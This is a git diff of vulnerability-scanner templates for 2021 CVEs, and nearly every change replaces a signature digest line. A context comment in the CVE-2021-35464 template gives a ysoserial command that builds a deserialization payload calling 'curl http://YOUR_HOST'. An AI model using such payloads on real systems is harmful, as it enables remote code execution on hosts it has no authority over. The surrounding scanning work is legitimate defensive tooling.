55637663fe..6e7608bbc4 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -61,4 +61,4 @@ http: # {{BaseURL}}/openam/oauth2/..;/ccversion/Version?jato.pageSession= # java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' -# digest: 4b0a0048304602210096ad692f00dcbf4f3af20af5a64849212f0d34f86c39fc4fb44827b84f7c71e1022100c49ca89081587287319c33037d60f573edf039decc7db504ba8c4f8be2da69e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a9dc1dbcd9a5743b604c50f16fa9cbf86ff32882259ea53c23844cab4fdc2834022100feb69f3f71ef9bb3b55d9aef1969fdec5eb48f4d20217becf055fa96d47ea48c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index f674842e2d..34328efc7b 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 401 -# digest: 4a0a00473045022055819e8cdb5dcdc004233f8a173514f660c7708e98c66aa9920871ec2ca70969022100a7fabd08928656f2dce44bc87916e1e6d23fbe29309f0dff542373be9cf5b065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022038395eec45a2fcbac960afbd8bd53a25a914bcc2f4375d12483be8cc15f4ff27022100b5684d7bca5fabf6916b2aa399a5ce877ab067bdf24985182742d8fa022443ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index 0f839ba7da..deaa0807fd 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203fa7de8fecbc2facc8c0a655b8b2cc61275326363d9fff38647fca243359d02f02202382cce3edd69ce78ac95cf891de98a149c0998b0d05ba805cd0fab8e0113e48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200156c6aef9781a725ef66c1df8f983ffa1e6c0179943ed27cf53c8c951bc743c022100849d78e05cf210611eb95423b7697aafba4308582f6fa47fafed2dd87da6c331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml index 765fb91c1e..fca4e00b2b 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aa647d7278be70f7ef65a356025ae3d22e20cc5aebb94c19af995eda0891d7270220009f787b78b8aba27783ce6d989d860f42d0dc1c269988692807dfe6fffaba3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100efbf49aef554eb97d596d461c90180fdc9227d51f720363d3bc85c74f701fe1102200a9df2e6c8d96bc023ddef3acaba857b06bcaf96f22cde890b45b3162fa4e688:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml index b69a735ba2..c2b6306af9 100644 --- a/http/cves/2021/CVE-2021-36260.yaml +++ b/http/cves/2021/CVE-2021-36260.yaml @@ -51,4 +51,4 @@ http: part: body_2 words: - "{{string}}" -# digest: 4b0a00483046022100b111a43ea33cd26295e4fef35df7ff880f43e8847011335dbdf1efdcfbf20738022100b0b41a74f5528b64e1b0700f377c4629ca12c346f9bfe81f1799651737baeb19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220065a52d1f8b613acf500a3ca6f176e20967966a7073dbca8383b424f06fbac6d0220425642ee1354bc6bfddad340bcff26d909fd7feea5125a3390d327ee75e9ad4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml index 2fe2767c5d..fc15ee2720 100644 --- a/http/cves/2021/CVE-2021-36356.yaml +++ b/http/cves/2021/CVE-2021-36356.yaml @@ -52,4 +52,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" -# digest: 490a0046304402207d315039be7b2374857658abe5c9080339493506959d103b741bd2b02930cb020220187d49b26985f25c39c9ba0317f1b0bf0540895f0ee8e3b35b33f10f2b8e4c86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203413df64712ea57d59bb2d86cd166be712ba380a013aa681d9d63d4780d2183602202bedd4f167a7f6023c115a69a60cfff0438b53ca9fd9f88ce19efd966620b47f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index 3d92b2e17f..1643e4a619 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -42,4 +42,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022100cb869fc390807661722089db3f26b28a3794a43b3cca905e55d84e61c0a69225022067c488943ca79fef10f100fa0e96c1d2ce819ff67af0b598c2d92ca30be6b3c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220186ad330555ff5c08b020283bc97e77c44aa5405f8165337f346ba0a2bb9c66a0220512d0e7b7f781db43bcde252535a9c928ebb8f3dc054906b4a50a31aa5666eaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index 3daed29755..4ad10985e7 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml @@ -72,4 +72,4 @@ http: - 'csrfp_login=([a-zA-Z0-9]+);' internal: true part: header -# digest: 490a0046304402204bbeed6302fbd74c4981446c4aec420dbd5e6b911f5f7a14f3e8b4d768c306fb02203c509944c3d418204a9b643c3a66e02ed59a5d53806b11c6c38444b56c217f79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab74c53210064e1139328949173dc23d52589b50b129169081cffa1bf655623a022100dac9a66a7541d090f92b37ff4f967c7f03a4ca2b95f83a68fb912c3dd3294944:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml index 7e66333de3..2d0c9893ad 100644 --- a/http/cves/2021/CVE-2021-3654.yaml +++ b/http/cves/2021/CVE-2021-3654.yaml @@ -45,4 +45,4 @@ http: status: - 302 - 301 -# digest: 4a0a00473045022038b9f6ddbb2bec14ec5183894095d1bb6407357f4b3884a6cd3968caf9b2ff4d022100dec5cef15816ab428fbc7a300123ad1d5f0e8bb046107d7f0d4f5d869b16d70c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aeef1ea5cff12a3a516d2d3bf9365f8a4fb1630dcf750973eda6f4c9e4e2b7d50220130d0586d6bdfdb83b140d56218ca387a28c8f270a400d1ac52682d44802c5d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index c64bd33fa8..8ffad535de 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -44,4 +44,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502201fb7d9f7f3b4cc99c307df40e242a485cec4ec2e1825cb4321b536061d94e5200221009cde712c4679e05357975cbc11bd9caaabcc6fe2ecf21d3d796c06da80f6ed32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203658bcc3d1c5b432ca051e70dc234752f08022da157d5d1a5f1343cf6ee0f67902207c76bb85ccf16cb7c5f30f14ea8a80bbafe97058e6d4d0b644d3f4761857cfed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml index 091c47d40d..c919fb6a01 100644 --- a/http/cves/2021/CVE-2021-36748.yaml +++ b/http/cves/2021/CVE-2021-36748.yaml @@ -48,4 +48,4 @@ http: - "contains(tolower(header_2), 'index.php?controller=404')" - "len(body_2) == 0" condition: and -# digest: 4a0a0047304502210086d824280f02e57da9f8e8dd279b769c0c8778ae15184ca95fba4f7d921ade7502206b3eb93275afcda1d68912cda1e9e9df0f2cf41e0153060af346b8e123a8b337:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022043798de7630850efa4311a8da4c0b13fcce088d9820604e127aba3e421f82a4e022100d856b45aab25eee2a04e56e58de90ff5871e4b43adcec24e1390f1d6e405af4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index ce177301df..6e6d4c5cd7 100644 --- a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022079aca011c64f9f42174da4c2ac2e79327a3b7f9cb9ec87b19a1d1622f87e55f9022100c5af542979ec21dec828b8bd3914169cb6e954bef293666dacc6840bc35c6993:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c8f40985bb5df8fe07810aeeef5fe75588c3bffc32a03b05ac321b1471ba8e5022100d1e1f8ca4a4399db1c9fef4e77c982a20ec7f83cb5626523c4084d2e5891f5f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index 72ca741e39..52963f665b 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204a660859c711b126edb6415cc095e15cfdcb553cef27e02ccc482c2310f22fa5022044fb232b8a52e45910c5e030ec95e0488cdef0e8ee9ad6fa6245217f4879d18b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204e94ab3ff2465df0f0bd94bc8f51df93a0d739cc45edbea2446150bbbb4913de022100a1e6430e740172a2e6a1bb5e76bff6640274c4c1b91d1b31f93e30937bc954b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index 2706cdd862..9f17e6143b 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022044a740d43743d6c86fa99d1d71e6331299ee72fdbcb93c5f5229ef1619021774022038b22cd63d9a3535d35f2588fddc0cfbfa48e7507fadda3beef37fbc2d36a204:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f56157cdfe11052f9683e3d1e537fa7c3597f6f58f376cbe3c55d1d4152a71d3022100d91870d067693baa163178f83d1a79311a718a354422a707e8b845af54b2bac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml index 3ee7325bae..3a76e3a915 100644 --- a/http/cves/2021/CVE-2021-37573.yaml +++ b/http/cves/2021/CVE-2021-37573.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100860677e3cb649f8221c48f8da8c476eaff6ae5218cc6f264058729a4175edb3d022100cde954092485d59c153fd0f1cbf309acc275463b5deb833deb6be569958419ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201737588b1087e5a4619955fe2a940685f0fda3bf66bf1e41cf7ebfa3d47389e402207ee672e47fd531b7a5d9b488aa08d95bcdff982987689acec457d3797c75c924:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml index 6e86dbf827..c660bc9ad7 100644 --- a/http/cves/2021/CVE-2021-37580.yaml +++ b/http/cves/2021/CVE-2021-37580.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008dc817a42d582540241a41c989a303ff874434de3f13d3696356f016dbbf7d26022078549e217e3ab9625e7da831d7b6b2071ed2f72bbeb8bc3adfa87b37e2c507e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ab926b1490fc289a0ea742ed2479c9b24c7b4661c1de6e9e810ba3d73d14fdcc022048cb38a850976e6bb62ba717194a8b14ce2836bb7cec53a7ca3823f8cd79dce9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml index c045da6fdf..2f2ba91351 100644 --- a/http/cves/2021/CVE-2021-37589.yaml +++ b/http/cves/2021/CVE-2021-37589.yaml @@ -65,4 +65,4 @@ http: - type: dsl dsl: - "status_code_2 == 500 && status_code_3 == 200" -# digest: 4a0a00473045022100bd23716f1545a3d6b6f9928e16ff24594ad46444ca7f5d2b0ff5781948e287ef0220786b038ec0a0a3a94e2643bab4e9fb9f4be5dfaf7002efdc42df3856ca18feeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201fc4c52886357c27e6af814954a33971f007d23cb05741475609c643c4d5a7f80220164a544ac3d34b939bd3efefd157aa7e02c9fba303f6cd5269e1f997159a1e49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml index 9930c91415..799838e4af 100644 --- a/http/cves/2021/CVE-2021-37704.yaml +++ b/http/cves/2021/CVE-2021-37704.yaml @@ -55,4 +55,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' part: body -# digest: 4a0a00473045022100ef2253e929975a34d563cf49ee7d028f01b7b8ca671e9e6062d5b2e76c1b96ce0220201a5a0ee0a5890537e41ca1f1c7aad20a621a30e07153368fec670ab9cf4355:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022060e173a6dda99c14036b4bf367bf38342fac18b275d36e5a0e7286b912fd3ffc02210086f7f0e86c9ffb8b728c7414a7f8dcfe3d1ffb8c2493f8a05c563fbec33ff95e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index 347f5ab75d..bd75777b90 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022049e77e74d7aa840c78bbc69fb100df9024897e4f9f0d9da80142b94f41067170022023e19aae9ff59fbcc630d762ee87f2ad1060e790de1227e9d1ea3819ee33d6d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4c54e2101d5771fb2126256511522a98c666533ee7712f2a45521a7a0f799270220518eda59726c72b34c97b2c12af0322bce2e6f98b97fed5cd71cf2ded4c6e046:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index c2fccad391..9398217562 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -79,4 +79,4 @@ http: regex: - type="hidden" value="(.*?)"> internal: true -# digest: 4a0a0047304502203de2b7d77a5529f357bcb560788f606818ec0078bd7dcc73e59424f576c7942b022100a391c11b19858fea9384a4e52929faca2c4b92472a5ce98f7ec6c5c8394c238a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e74f9ac2c2f510a6a5cc881445af090226068bbbf1a6ce1faf4e243977148e9b0221008cfa692be823cb8b62ef4510c769823c0aca951e4ba3696cf56bef2e21d0f23b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index 506d8feeaa..7b926dce94 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dab8ab75c1d3700a4c024ce898811f0c0b7996a779ae942f9fc9188869df37cd02210081e4282e11fdf1602ccae821ef099b54a525e0b35d859eda274a52c43b18dbd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203e71a7a4dfa97560003b93adc24041a245cae3af11c121afdde3bc106492e7e002207b909987ee42203897f0a3976aa0330600c2897283f195497c01641fdab773e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 32919c3b3f..4b4fe50d76 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a40d9a2b0cb51dca3b3b675cf715f18ccc4bd7714edd7220f7ec9bd934962f330220442c8f143684b18004b46f89d1886b6905cbb55977566ce1452887fcfd509d4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200132d28b9ece1813c2cbff293d1769670075b3a8fc3e668bed95a068ed7993c80220557dec056c887098af52c27ba581fc7e7d6f4151e9b37b2edadbd1a693f0c329:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index 981649fa78..b8172d9f51 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -48,4 +48,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "pagination") && contains(body, "data")' condition: and -# digest: 4a0a0047304502204b3206034be2f774b8b91870d6386c1beadd44650a52a79e394ef377b8fd8a7e022100be385f84a4f30de70a9f03f2813758d984dbe67e2d2ddbdf8ffb06f772ea2772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022068741ea24b809bbe7b0808375c237dc88233f8558be48aa5f2a5267c9b309194022100ec56309db868de2bc5d68b88832f2313b46ae7b792ee6e338c40e61c39568b76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index c5a4ea9ab3..62ac984652 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fe062755f4b07576ae5328bf856241f5ea8ffcd7471aee2f20d0e81118a750f7022100963f6ecde4366021315b1d07dede1e4330917c47e2ac4b7068b9c2496b1cc675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022009a97f597a540e6741f3229b70b1b29fa0a641ce0915cd34c494cea557874333022031a39d9dc34a51219e3281440d3bfefc61c0be8ec107cb5903f637348fa7675f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index 6ffd29adeb..5286baaf02 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022018328f164b60172c333f6c40599f821c588213819031a1e9a2fc07c9e6f3fe74022100dc1c8beb95c9ea2da8dbf9b90d938190782ff387c7a21e0c44387234f04094fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022078990d8e76d7d0907f53325cf4377dffd1589c040424ba73eed6ea24d08167a8022100dc794e1260b3b791daed6f880cdb41518a2a4f9b170fd99319c356adb635b0cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml index 9c48a5c1ab..63bb0460c4 100644 --- a/http/cves/2021/CVE-2021-39320.yaml +++ b/http/cves/2021/CVE-2021-39320.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210093c2ed5b393a57e102799fbb901df39eee9afaf5c1113fb777dd86d1218e7434022100a0402cece1c5f7f2527b421dfde31d2a5ac624e7223448265e76ab4c24d85271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210081a3f1d940c56de47725f8a715b7af3cb5dd521abf1d0fe0ec0d5717ad5d1b7c02200c7c246a4c5e1887f0b04c21810d1950c5091535d576a87d7941b0d956d2a891:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml index 5bddc86dcb..aa96d11e4c 100644 --- a/http/cves/2021/CVE-2021-39433.yaml +++ b/http/cves/2021/CVE-2021-39433.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022045ba9ff8302706637947b44449b56a71b13f3b6d7038baa5c14980a6a1b951ed022100cb6dd26851e8c38528eb8ab2c68b2e3e7378d728c04da0e44b42ab87752924ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b8cf99898eb4e0b35c557c93898716ae32358b101a4ed8d4017383d874cfe87202206e7cf5d8562794d68f0ec7444e9b34b3aa9dbab856202e846777e8dbc7de89e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index 5673dc3ced..31fdb0043c 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# digest: 4b0a00483046022100d016209aa95f121aad60021186d6a2c56623b790d5930cdffd96e00fdb5d2cbe022100e6536c22659a8f7fa88f0fa35686a7ad134c968f613c7471a7c3f6413618ee25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a70a7f35b960fece64c3923d415e8d8d093c3b64e0bf91ec7780c1feb4429e80221008ce9c58c3d00728d31eba4e7e89412be2bd7044ab133bc6e2caddea02a7ba66d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index adbe2c9f08..aee3e04b55 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022073d439d60074e5d1c5d1337480dffdffea8f90c2d58d768b7d08a2c4498f585a02201a7e02758d8c5b5caf499e37224e8921c170b88c2dcc0be46064b4d10546f7d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f67ff446428cbaabbc3fbcd9a29b01b1ab220221767f2b5834e1abe70ba95ce02205a46ec53896c9c2628f41578ebdb0ce5f9f9a3e8c71b06fe6ee90d2543ac9a78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index 739563d63a..0fe67cdf97 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202f6a6f1686de8b8b85a4c8c0e8a49bd69f1628bbea7bfd64bdfac2257741b25d022100f6dc5b8e874a47e6c22fa0f1890e646ce7ad62634e7547f215f4c2099198cd43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008111d303ca6b6f56a2e50b1210b78146af0036e79f0ebf56930f5be7d0ab7475022100e3506e8d151fd899d096f197f4984c79bd88ce9fa29b71d151194eae4ca97a80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40323.yaml b/http/cves/2021/CVE-2021-40323.yaml index bd5031e0cc..4f1e22820e 100644 --- a/http/cves/2021/CVE-2021-40323.yaml +++ b/http/cves/2021/CVE-2021-40323.yaml @@ -109,4 +109,4 @@ http: regex: - '(.*?)' internal: true -# digest: 4a0a0047304502206e4478c33e50a35d84d860a861a9f49e8343e5484089045ce8b3093e6faeac1a022100c816efd13f1937362330d8066062d1062b62bdd6a54dce8356e799717937f527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c045c74789870365f66a86a879b7c4ea9b37baab9553ea87f0caaacf2f8d0c1e02205b0041d6d08c291c6d1effbf614bc326be46b05618c6ac25c13595f1d88cabf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml index c55c863ca9..c406d6e7a6 100644 --- a/http/cves/2021/CVE-2021-40438.yaml +++ b/http/cves/2021/CVE-2021-40438.yaml @@ -42,4 +42,4 @@ http: - 'contains_all(header, "X-Interactsh-Version", "Server: oast")' - "!contains(body, '

Interactsh Server

')" condition: and -# digest: 4a0a00473045022100d8d05e6148126d10da099a868bd043059ea9cd59f882302a022663b194f4cbab0220434cac7a775e4c4845de5dd47b83c2c14723db31dcf51b091617be23b576b578:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201f9fbcee7dc1fc44a099c7f645d35d5693eeefa792f7825bcc51ed8b777174250221009e077fff03377fddd575987dba137468656114a1b15df68fb847b4cc71f2bf2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 75165cd98f..6ad3d31280 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -120,4 +120,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c74e11c1bfb9c715d80f1c403010aa5a992ece98f99ff25aa12b5fdf7a4fe71c0220030dae45c7af30b2d89b390eb53b6bb2b534cf8be0e7c98a0cf98e490434fa5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200c53718fe980c8c145d3bf51515b9321e47bfaaf917a47caad718a3a380fb9430220718d7de44ecda49d098a76d52400dd0ba5c209a38e2f6354ce554bdba5b16220:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index f814c685c7..4a0cccf2d0 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201bf834abd657937ae412fc33a7d71f6d59db79266d9801d409f0d7d74274f0ad022100aefd147e291833eaf15cba8577654e79cf08eaacfc518e271ddb56bf1246c490:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009deec4503a27481a39cbbd347424004f99b058a0a1a7f67d305f399baf9f467f02206bc9ce592299166b2928e8be08cffa8837c7ed8de82317de6532ec958c2cb82f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40651.yaml b/http/cves/2021/CVE-2021-40651.yaml index 7b03ac2e4c..cff6b6172a 100644 --- a/http/cves/2021/CVE-2021-40651.yaml +++ b/http/cves/2021/CVE-2021-40651.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_1, "openSIS")' - "status_code == 200" condition: and -# digest: 4b0a00483046022100b777c6dc91c4e0b6009c87ff6f67a70d09e714c2bd6a19cae6029a079bffc337022100936149daaf5ffa9f58ed3a99dc2885caedd9aa5ddc873eb8b48eff764af3110d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100afc93af4ca71f78a66e289814973251a2fd69ed04dc9706b2033433f6cd71eec022100a0c2d05f94752f57f256120d5a78d05308e06c79adedadf48590890eb55fda30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index 140ba31264..7ce8ebe2e6 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210097677b11bc4965e4caadab5f77264e9a0e4a19a059a4c5e5269a6aff5c98b76e022015b1d85cb9b06c62a60bfe3cf6f89fb25cc22fb593d23eb92e858bc117b5b1a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 